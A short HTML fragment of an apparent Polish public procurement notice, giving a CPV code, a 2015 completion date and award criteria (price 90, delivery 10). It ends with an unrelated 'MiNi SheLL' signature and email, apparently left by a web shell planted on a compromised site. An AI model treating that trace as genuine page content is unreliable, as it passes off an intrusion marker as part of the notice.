Wymiary 110x39x26mm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin dostawy - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com